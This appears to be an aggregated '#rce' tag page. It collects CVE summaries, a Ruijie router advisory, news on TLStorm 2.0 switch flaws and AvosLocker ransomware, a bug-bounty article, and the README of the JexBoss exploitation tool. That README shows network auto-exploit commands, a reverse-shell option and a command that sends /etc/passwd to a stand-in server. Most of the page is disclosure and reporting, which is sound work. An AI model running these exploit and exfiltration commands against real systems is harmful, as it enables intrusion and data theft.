In ion, there is a possible use after free due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS06371108; Issue ID: ALPS06371108.

CVE-2022-21743: May 2022

Ruijie RG-EW series routers suffer from six different remote code execution vulnerabilities. Findings were tested on Ruijie RG-EW1200 and Ruijie RG-EW1200G PRO.

Advisory: Multiple Vulnerabilities in Ruijie RG-EW Series Routers

=======  
Summary  
=======

Multiple vulnerabilities was found in Ruijie RG-EW Series Routers from  
Ruijie Networks, including 1 pre-authenticated and 5 post-authenticated  
Remote Code Execution (RCE).

==============  
CVE-2021-43159  
==============

## Description

A Remote Code Execution (RCE) vulnerability exists in Ruijie Networks  
Ruijie RG-EW Series Routers up to ReyeeOS 1.55.1915 / EW_3.0(1)B11P55  
via the setSessionTime function in /cgi-bin/luci/api/common.

## Details

- Type: Post-authenticated RCE / Command Injection  
- Discoverer: Minh Khoa of VSEC  
- Affected Component:  
     File: /usr/lib/lua/luci/modules/common.lua  
     Function: setSessionTime  
- Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO

==============  
CVE-2021-43160  
==============

## Description

A Remote Code Execution (RCE) vulnerability exists in Ruijie Networks  
Ruijie RG-EW Series Routers up to ReyeeOS 1.55.1915 / EW_3.0(1)B11P55  
via the switchFastDhcp function in /cgi-bin/luci/api/diagnose.

## Details

- Type: Post-authenticated RCE / Command Injection  
- Discoverer: Minh Khoa of VSEC  
- Affected Component:  
     File: /usr/lib/lua/luci/modules/diagnose.lua  
     Function: switchFastDhcp  
- Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO

==============  
CVE-2021-43161  
==============

## Description

A Remote Code Execution (RCE) vulnerability exists in Ruijie Networks  
Ruijie RG-EW Series Routers up to ReyeeOS 1.55.1915 / EW_3.0(1)B11P55  
via the doSwitchApi function in /cgi-bin/luci/api/switch.

## Details  
- Type: Post-authenticated RCE / Command Injection  
- Discoverer: Minh Khoa of VSEC  
- Affected Component:  
     File: /usr/lib/lua/luci/modules/switch.lua  
     Function: doSwitchApi  
- Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO

==============  
CVE-2021-43162  
==============

## Description

A Remote Code Execution (RCE) vulnerability exists in Ruijie Networks  
Ruijie RG-EW Series Routers up to ReyeeOS 1.55.1915 / EW_3.0(1)B11P55  
via the runPackDiagnose function in /cgi-bin/luci/api/diagnose.

## Details

- Type: Post-authenticated RCE / Command Injection  
- Discoverer: Minh Khoa of VSEC  
- Affected Component:  
     File: /usr/lib/lua/luci/modules/diagnose.lua  
     Function: runPackDiagnose  
- Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO

==============  
CVE-2021-43163  
==============

## Description

A Remote Code Execution (RCE) vulnerability exists in Ruijie Networks  
Ruijie RG-EW Series Routers up to ReyeeOS 1.55.1915 / EW_3.0(1)B11P55  
via the checkNet function in /cgi-bin/luci/api/auth.

## Details

- Type: Pre-authenticated RCE / Command Injection  
- Discoverer: Minh Khoa of VSEC  
- Affected Component:  
     File: /usr/lib/lua/luci/modules/noauth.lua  
     Function: checkNet  
- Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO

==============  
CVE-2021-43164  
==============

## Description

A Remote Code Execution (RCE) vulnerability exists in Ruijie Networks  
Ruijie RG-EW Series Routers up to ReyeeOS 1.55.1915 / EW_3.0(1)B11P55  
via the updateVersion function in /cgi-bin/luci/api/wireless.

## Details

- Type: Post-authenticated RCE / Command Injection  
- Discoverer: Minh Khoa of VSEC  
- Affected Component:  
     File: /usr/lib/lua/luci/modules/wireless.lua  
     Function: updateVersion  
- Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO

--   
Khoa

Ruijie RG-EW Remote Code Execution

A Remote Code Execution (RCE) vulnerability exists in Pixelimity 1.0 via admin/admin-ajax.php?action=install_theme.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-28590: A Remote Code Execution (RCE) vulnerability exists in pixelimity via admin/admin-ajax.php?action=install_theme. · Issue #24 · pixelimity/pixelimity

Cybersecurity researchers have detailed as many as five severe security flaws in the implementation of TLS protocol in several models of Aruba and Avaya network switches that could be abused to gain remote access to enterprise networks and steal valuable information.
The findings follow the March disclosure of TLStorm, a set of three critical flaws in APC Smart-UPS devices that could permit an

Cybersecurity researchers have detailed as many as five severe security flaws in the implementation of TLS protocol in several models of Aruba and Avaya network switches that could be abused to gain remote access to enterprise networks and steal valuable information.

The findings follow the March disclosure of TLStorm, a set of three critical flaws in APC Smart-UPS devices that could permit an attacker to take over control and, worse, physically damage the appliances.

IoT security firm Armis, which uncovered the shortcomings, noted that the design flaws can be traced back to a common source: a misuse of NanoSSL, a standards-based SSL developer suite from Mocana, a DigiCert subsidiary.

The new set of flaws, dubbed **TLStorm 2.0**, renders Aruba and Avaya network switches vulnerable to remote code execution vulnerabilities, enabling an adversary to commandeer the devices, move laterally across the network, and exfiltrate sensitive data.

Affected devices include Avaya ERS3500 Series, ERS3600 Series, ERS4900 Series, and ERS5900 Series as well as Aruba 5400R Series, 3810 Series, 2920 Series, 2930F Series, 2930M Series, 2530 Series, and 2540 Series.

Armis chalked up the flaws to an "edge case," a failure to adhere to guidelines pertaining to the NanoSSL library that could result in remote code execution. The list of remote code execution bugs is as follows -

*   **CVE-2022-23676** (CVSS score: 9.1) - Two memory corruption vulnerabilities in the RADIUS client implementation of Aruba switches
*   **CVE-2022-23677** (CVSS score: 9.0) - NanoSSL misuse on multiple interfaces in Aruba switches
*   **CVE-2022-29860** (CVSS score: 9.8) - TLS reassembly heap overflow vulnerability in Avaya switches
*   **CVE-2022-29861** (CVSS score: 9.8) - HTTP header parsing stack overflow vulnerability in Avaya switches
*   HTTP POST request handling heap overflow vulnerability in a discontinued Avaya product line (no CVE)

"These research findings are significant as they highlight that the network infrastructure itself is at risk and exploitable by attackers, meaning that network segmentation alone is no longer sufficient as a security measure," Barak Hadad, head of research in engineering at Armis, said.

Organizations deploying impacted Avaya and Aruba devices are highly recommended to apply the patches to mitigate any potential exploit attempts.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Critical TLStorm 2.0 Bugs Affect Widely-Used Aruba and Avaya Network Switches

In the latest incarnation of the TLStorm vulnerability, switches from Avaya and Aruba — and perhaps others — are susceptible to compromise from an internal attacker.

Network switches from Aruba and Avaya are vulnerable to multiple flaws that could allow attackers to remotely execute code and completely take over the devices.

Researchers from device-intelligence firm Armis found five vulnerabilities — two flaws in Aruba switches and three flaws in Avaya switches — that could be used to compromise networks that allow some outsider access, even with limited rights. The flaws can be exploited by a user of a captive portal or authentication server, researchers explained.

Worryingly, in looking at the details of the bugs, the three Avaya bugs are zero-click, requiring no authentication or user interaction to exploit. One of them affects an end-of-life device and won't be receiving a patch.

Three of the vulnerabilities originate with improper handling of errors produced by a third-party library for implementing TLS produced by Internet of Things (IoT) cybersecurity firm Mocana.

Because switches are typically not Internet-facing, the vulnerabilities face less danger from external hackers, but the risk is still significant, says Barak Hadad, head of research for Armis.

"These are major issues, because switches act as the gatekeepers when we talk about segmentation," he says. "When you gain control over switches, any segmentation of the network becomes invalid."

The vulnerability details are as follows:

Aruba:

*   CVE-2022-23677 (9.0 CVSS score) — NanoSSL misuse on multiple interfaces (RCE)\*
*   CVE-2022-23676 (9.1 CVSS score) — RADIUS client memory corruption vulnerabilities

Avaya:

*   CVE-2022-29860 (CVSS 9.8) — TLS reassembly heap overflow\*
*   CVE-2022-29861 (CVSS 9.8) — HTTP header parsing stack overflow
*   HTTP POST request handling heap overflow (no CVE because it is in an older version)\*

\* These are caused by the interaction between Mocana NanoSSL and the products.

**Software Supply-Chain Woes Persist**  
The vulnerabilities underscore the risks of the software supply chain and the potential dangers that come with using third-party components. Security flaws in the libraries on which software depends — or in this case, in the way that the software and library interact — can create or propagate vulnerabilities. On average, 78% of software codebases consist of open source components and libraries.

In March, researchers discovered a similar set of flaws that caused security vulnerabilities in more than 150 IoT products, also caused by another third-party component.

"While the use of external libraries has many advantages, it also brings inherent uncertainty," Armis stated in its security advisory published on May 3. "Implanting a 'foreign' code means the vendor is trusting it to be implemented safely, since any security issues originating in the external library are embedded within it, and automatically become security issues which the vendor has less control over."

**TLStorm, Part 2**  
At the heart of the Mocana-related vulnerabilities are unstable error states in the Mocana NanoSSL library that handles transport layer security (TLS) for the products' management interface.

The issues occur because the attacker can craft network packets that cause errors in the Mocana NanoSSL library, and developers producing software for vendors do not handle the errors properly.

The result are two classes of vulnerabilities: memory corruption and state confusion.

"If you start a TLS handshake and the other side sends an improper message, if you don't check the error code correctly, that scenario can be leveraged to gain remote code execution in some cases," Armis' Hadad says. "The manual clearly says that the developer should check the error, but as we know, it's not common for developers to read through the entire manual."

Armis has worked with Mocana, Aruba, and Avaya to remediate the issues where appropriate. The companies' customers have been notified, and each company has released updated software. In Mocana's case, even though the vulnerabilities are not technically caused by the software, the company has created an update anyway to avoid future flawed implementations.

"It is not a Mocana vulnerability, but nonetheless, they have published new software that makes it so you are not in a vulnerable situation just because you did not check the error code," Hadad says.

The vulnerabilities, dubbed TLStorm 2.0 by Armis, are similar to ones announced in March that affect smart-connected uninterruptible power supplies (UPS).

**Not the First Flawed implementation**  
Previously, Armis researchers showed the same vulnerabilities used against several models of UPS from APC, now owned by Schneider Electric. The attacks, which targeted UPS that connected to the Schneider Electric Cloud to enable management, could allow attackers to remotely compromise devices without any user interaction or leaving any trace of the attack.

Because new firmware could be loaded into the devices remotely, attackers could change the waveform and voltage of the AC power provided to connected devices and even cause the UPS to overheat.

"The fact that UPS devices regulate high voltage power, combined with their Internet connectivity — makes them a high-value cyber-physical target," Armis stated in its March advisory regarding the vulnerabilities, which it called TLStorm. "Since the TLS attack vector can originate from the Internet, these vulnerabilities can act as a gateway to the internal corporate network. Bad actors can use the TLS state confusion to identify themselves as the Schneider Electric cloud and collect information about the UPS behind the corporate firewall."

TLS Flaws Leave Avaya, Aruba Switches Open to Complete Takeover

Cybersecurity researchers have disclosed a new variant of the AvosLocker ransomware that disables antivirus solutions to evade detection after breaching target networks by taking advantage of unpatched security flaws. 
"This is the first sample we observed from the U.S. with the capability to disable a defense solution using a legitimate Avast Anti-Rootkit Driver file (asWarPot.sys)," Trend

Cybersecurity researchers have disclosed a new variant of the AvosLocker ransomware that disables antivirus solutions to evade detection after breaching target networks by taking advantage of unpatched security flaws.

"This is the first sample we observed from the U.S. with the capability to disable a defense solution using a legitimate Avast Anti-Rootkit Driver file (asWarPot.sys)," Trend Micro researchers, Christoper Ordonez and Alvin Nieto, said in a Monday analysis.

"In addition, the ransomware is also capable of scanning multiple endpoints for the Log4j vulnerability (Log4shell) using Nmap NSE script."

AvosLocker, one of the newer ransomware families to fill the vacuum left by REvil, has been linked to a number of attacks that targeted critical infrastructure in the U.S., including financial services and government facilities.

A ransomware-as-a-service (RaaS) affiliate-based group first spotted in July 2021, AvosLocker goes beyond double extortion by auctioning data stolen from victims should the targeted entities refuse to pay the ransom.

Other targeted victims claimed by the ransomware cartel are said to be located in Syria, Saudi Arabia, Germany, Spain, Belgium, Turkey, the U.A.E., the U.K., Canada, China, and Taiwan, according to an advisory released by the U.S. Federal Bureau of Investigation (FBI) in March 2022.

Telemetry data gathered by Trend Micro shows that the food and beverage sector was the most hit industry between July 1, 2021 and February 28, 2022, followed by technology, finance, telecom, and media verticals.

The entry point for the attack is believed to have been facilitated by leveraging an exploit for a remote code execution flaw in Zoho's ManageEngine ADSelfService Plus software (CVE-2021-40539) to run an HTML application (HTA) hosted on a remote server.

"The HTA executed an obfuscated PowerShell script that contains a shellcode, capable of connecting back to the \[command-and-control\] server to execute arbitrary commands," the researchers explained.

This includes retrieving an ASPX web shell from the server as well as an installer for the AnyDesk remote desktop software, the latter of which is used to deploy additional tools to scan the local network, terminate security software, and drop the ransomware payload.

Some of the components copied to the infected endpoint are a Nmap script to scan the network for the Log4Shell remote code execution flaw (CVE-2021-44228) and a mass deployment tool called PDQ to deliver a malicious batch script to multiple endpoints.

The batch script, for its part, is equipped with a wide range of capabilities that allows it to disable Windows Update, Windows Defender, and Windows Error Recovery, in addition to preventing safe boot execution of security products, creating a new admin account, and launching the ransomware binary.

Also used is aswArPot.sys, a legitimate Avast anti-rootkit driver, to kill processes associated with different security solutions by weaponizing a now-fixed vulnerability in the driver the Czech company resolved in June 2021.

"The decision to choose the specific rootkit driver file is for its capability to execute in kernel mode (therefore operating at a high privilege)," the researchers pointed out. "This variant is also capable of modifying other details of the installed security solutions, such as disabling the legal notice."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

AvosLocker Ransomware Variant Using New Trick to Disable Antivirus Protection

All versions of package com.bstek.ureport:ureport2-console are vulnerable to Remote Code Execution by connecting to a malicious database server, causing arbitrary file read and deserialization of local gadgets.

**Deserialization of Untrusted Data in com.bstek.ureport:ureport2-console**

Critical severity GitHub Reviewed Published May 3, 2022 • Updated May 19, 2022

GHSA-w39x-chvm-pj3c: Deserialization of Untrusted Data in com.bstek.ureport:ureport2-console

The Java Remote Management Interface of all versions of Orlansoft ERP was discovered to contain a vulnerability due to insecure deserialization of user-supplied content, which can allow attackers to execute arbitrary code via a crafted serialized Java object.

**JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool**

JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and others Java Platforms, Frameworks, Applications, etc.

**Requirements**

*   Python >= 2.7.x
*   urllib3
*   ipaddress

**Installation on Linux\\Mac**

To install the latest version of JexBoss, please use the following commands:

    git clone https://github.com/joaomatosf/jexboss.git
    cd jexboss
    pip install -r requires.txt
    python jexboss.py -h
    python jexboss.py -host http://target_host:8080
    
    OR:
    
    Download the latest version at: https://github.com/joaomatosf/jexboss/archive/master.zip
    unzip master.zip
    cd jexboss-master
    pip install -r requires.txt
    python jexboss.py -h
    python jexboss.py -host http://target_host:8080
    

If you are using CentOS with Python 2.6, please install Python2.7. Installation example of the Python 2.7 on CentOS using Collections Software scl:

    yum -y install centos-release-scl
    yum -y install python27
    scl enable python27 bash
    

**Installation on Windows**

If you are using Windows, you can use the Git Bash to run the JexBoss. Follow the steps below:

*   Download and install Python
*   Download and install Git for Windows
*   After installing, run the Git for Windows and type the following commands:

        PATH=$PATH:C:\Python27\
        PATH=$PATH:C:\Python27\Scripts
        git clone https://github.com/joaomatosf/jexboss.git
        cd jexboss
        pip install -r requires.txt
        python jexboss.py -h
        python jexboss.py -host http://target_host:8080
        
    

**Features**

The tool and exploits were developed and tested for:

*   JBoss Application Server versions: 3, 4, 5 and 6.
*   Java Deserialization Vulnerabilities in multiple java frameworks, platforms and applications (e.g., Java Server Faces - JSF, Seam Framework, RMI over HTTP, Jenkins CLI RCE (CVE-2015-5317), Remote JMX (CVE-2016-3427, CVE-2016-8735), etc)

The exploitation vectors are:

*   /admin-console
    *   tested and working in JBoss versions 5 and 6
*   /jmx-console
    *   tested and working in JBoss versions 4, 5 and 6
*   /web-console/Invoker
    *   tested and working in JBoss versions 4, 5 and 6
*   /invoker/JMXInvokerServlet
    *   tested and working in JBoss versions 4, 5 and 6
*   Application Deserialization
    *   tested and working against multiple java applications, platforms, etc, via HTTP POST Parameters
*   Servlet Deserialization
    *   tested and working against multiple java applications, platforms, etc, via servlets that process serialized objets (e.g. when you see an "Invoker" in a link)
*   Apache Struts2 CVE-2017-5638
    *   tested in Apache Struts 2 applications
*   Others

**Videos**

*   Exploiting Java Deserialization Vulnerabilities (RCE) on JSF/Seam Applications via javax.faces.ViewState with JexBoss

*   Exploiting JBoss Application Server with JexBoss

*   Exploiting Apache Struts2 (RCE) with Jexboss (CVE-2017-5638)

**Screenshots**

*   Simple usage examples:

*   Example of standalone mode against JBoss:

    $ python jexboss.py -u http://192.168.0.26:8080
    

 

*   Usage modes:

*   Network scan mode:

    $ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080 -results results.txt
    

*   Network scan with auto-exploit mode:

    $ python jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080 -results results.txt
    

*   Results and recommendations:

**Reverse Shell (meterpreter integration)**

After you exploit a JBoss server, you can use the own jexboss command shell or perform a reverse connection using the following command:

       jexremote=YOUR_IP:YOUR_PORT
    
       Example:
         Shell>jexremote=192.168.0.10:4444
    

*   Example: 

When exploiting java deserialization vulnerabilities (Application Deserialization, Servlet Deserialization), the default options are: make a reverse shell connection or send a commando to execute.

**Usage examples**

*   For Java Deserialization Vulnerabilities in a custom HTTP parameter and to send a custom command to be executed on the exploited server:

    $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name --cmd 'curl -d@/etc/passwd http://your_server'
    

*   For Java Deserialization Vulnerabilities in a custom HTTP parameter and to make a reverse shell (this will ask for an IP address and port of your remote host):

    $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name
    

*   For Java Deserialization Vulnerabilities in a Servlet (like Invoker):

    $ python jexboss.py -u http://vulnerable_java_app/path --servlet-unserialize
    

*   For Apache Struts 2 (CVE-2017-5638)

    $ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2
    

*   For Apache Struts 2 (CVE-2017-5638) with cookies for authenticated resources

    $ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2 --cookies "JSESSIONID=24517D9075136F202DCE20E9C89D424D"
    

*   Auto scan mode:

    $ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 -results report_auto_scan.log
    

*   File scan mode:

    $ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log
    

*   More Options:

    optional arguments:
      -h, --help            show this help message and exit
      --version             show program's version number and exit
      --auto-exploit, -A    Send exploit code automatically (USE ONLY IF YOU HAVE
                            PERMISSION!!!)
      --disable-check-updates, -D
                            Disable two updates checks: 1) Check for updates
                            performed by the webshell in exploited server at
                            http://webshell.jexboss.net/jsp_version.txt and 2)
                            check for updates performed by the jexboss client at
                            http://joaomatosf.com/rnp/releases.txt
      -mode {standalone,auto-scan,file-scan}
                            Operation mode (DEFAULT: standalone)
      --app-unserialize, -j
                            Check for java unserialization vulnerabilities in HTTP
                            parameters (eg. javax.faces.ViewState, oldFormData,
                            etc)
      --servlet-unserialize, -l
                            Check for java unserialization vulnerabilities in
                            Servlets (like Invoker interfaces)
      --jboss               Check only for JBOSS vectors.
      --jenkins             Check only for Jenkins CLI vector.
      --jmxtomcat           Check JMX JmxRemoteLifecycleListener in Tomcat
                            (CVE-2016-8735 and CVE-2016-8735). OBS: Will not be
                            checked by default.
      --proxy PROXY, -P PROXY
                            Use a http proxy to connect to the target URL (eg. -P
                            http://192.168.0.1:3128)
      --proxy-cred LOGIN:PASS, -L LOGIN:PASS
                            Proxy authentication credentials (eg -L name:password)
      --jboss-login LOGIN:PASS, -J LOGIN:PASS
                            JBoss login and password for exploit admin-console in
                            JBoss 5 and JBoss 6 (default: admin:admin)
      --timeout TIMEOUT     Seconds to wait before timeout connection (default 3)
    
    Standalone mode:
      -host HOST, -u HOST   Host address to be checked (eg. -u
                            http://192.168.0.10:8080)
    
    Advanced Options (USE WHEN EXPLOITING JAVA UNSERIALIZE IN APP LAYER):
      --reverse-host RHOST:RPORT, -r RHOST:RPORT
                            Remote host address and port for reverse shell when
                            exploiting Java Deserialization Vulnerabilities in
                            application layer (for now, working only against *nix
                            systems)(eg. 192.168.0.10:1331)
      --cmd CMD, -x CMD     Send specific command to run on target (eg. curl -d
                            @/etc/passwd http://your_server)
      --windows, -w         Specifies that the commands are for rWINDOWS System$
                            (cmd.exe)
      --post-parameter PARAMETER, -H PARAMETER
                            Specify the parameter to find and inject serialized
                            objects into it. (egs. -H javax.faces.ViewState or -H
                            oldFormData (<- Hi PayPal =X) or others) (DEFAULT:
                            javax.faces.ViewState)
      --show-payload, -t    Print the generated payload.
      --gadget {commons-collections3.1,commons-collections4.0,groovy1}
                            Specify the type of Gadget to generate the payload
                            automatically. (DEFAULT: commons-collections3.1 or
                            groovy1 for JenKins)
      --load-gadget FILENAME
                            Provide your own gadget from file (a java serialized
                            object in RAW mode)
      --force, -F           Force send java serialized gadgets to URL informed in
                            -u parameter. This will send the payload in multiple
                            formats (eg. RAW, GZIPED and BASE64) and with
                            different Content-Types.
    
    Auto scan mode:
      -network NETWORK      Network to be checked in CIDR format (eg. 10.0.0.0/8)
      -ports PORTS          List of ports separated by commas to be checked for
                            each host (eg. 8080,8443,8888,80,443)
      -results FILENAME     File name to store the auto scan results
    
    File scan mode:
      -file FILENAME_HOSTS  Filename with host list to be scanned (one host per
                            line)
      -out FILENAME_RESULTS
                            File name to store the file scan results
    
    

**Questions, problems, suggestions and etc:**

*   joaomatosf@gmail.com

CVE-2020-23620: GitHub - joaomatosf/jexboss: JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool

The security vulnerability payout set bug hunters rejoicing, but claiming the reward is much, much easier said than done.

Google has expanded its bug-bounty program to offer a whopping $1.5 million for a top-notch Android 13 Beta exploit – specifically, for a hack of the Titan M security chip that ships with Pixel phones.

Android 13 Beta became available last week to developers and early adopters, with Google promising an outsized focus on privacy and security. It apparently aims to deliver in that department, if the bounty bump is any indication.

The Internet giant announced a 50% bonus for all Android 13 Beta exploits on Twitter and updated its Android program page to reflect the offer, adding an important caveat: "Vulnerabilities must be exclusive to Android 13 and must not reproduce on any other version of Android," it noted.

To take advantage of the largess, bug hunters will need to set off on safari soon: The increased rewards are only good for reports filed before May 27.

**Putting the $1.5M Payout into Context  
**For a sense of perspective on that payout number, it's worth noting that $1.5 million is exponentially larger than the highest-ever bounty for an Android vulnerability, which was paid last year — $157,000 for a critical exploit chain in an unspecified component. It's also half the amount paid out in the entirety of 2021 for Android flaws ($3 million total, across hundreds of exploits), and roughly equal to the sum total of payouts in 2020. So, this is a lot of love for one bug.

That said, the likelihood of seeing a payout that size is a long shot. That's because it would be connected to the last time Google dabbled in big-bucks territory: In 2019, it began offering $1 million to anyone who could hack the Titan M security chip, which is embedded in Google Pixel smartphones. Specifically, it requires a "full chain remote code execution exploit with persistence, which compromises the Titan M secure element on Pixel devices."

But so far, that reward has gone unclaimed. Thus, to reel in the $1.5 million on offer, an ethical hacker would need to not only subvert the never-subverted Titan M, but also make sure the exploit works on Android 13 Beta – and only on Android 13 Beta.

The difficulty scale hasn't deterred some. As one bounty hunter tweeted, "BRB going to sell my soul to the hacker gods to get a full remote code execution exploit chain on the Titan M."

**All Android 13 Beta Exploits Get a Bump  
**Google's other rewards for finding an exploitable security vulnerability in Android are also subject to the 50% bonus for Android 13 Beta. Those run anywhere from $75,000 (for a Device Policy Controller bypass or code execution in a privileged process) to $500,000 (for exfiltrating high-value data secured by Titan M). Most rewards clock in at $250,000.

OEM code (libraries and drivers), Digital Car Keys, kernel, boot-loader, Secure Element code, TrustZone OS and apps, system on chip (SoC), MicroController Unit (MCU), Boot ROM, RAM memory, Flash memory, filesystem, Trusted Execution Environment (TEE), radio units, etc., are all considered eligible targets.

Google Offers $1.5M Bug Bounty for Android 13 Beta

The Import WP WordPress plugin before 2.4.6 does not validate the imported file in some cases, allowing high privilege users such as admin to upload arbitrary files (such as PHP), leading to RCE

Tag

#rce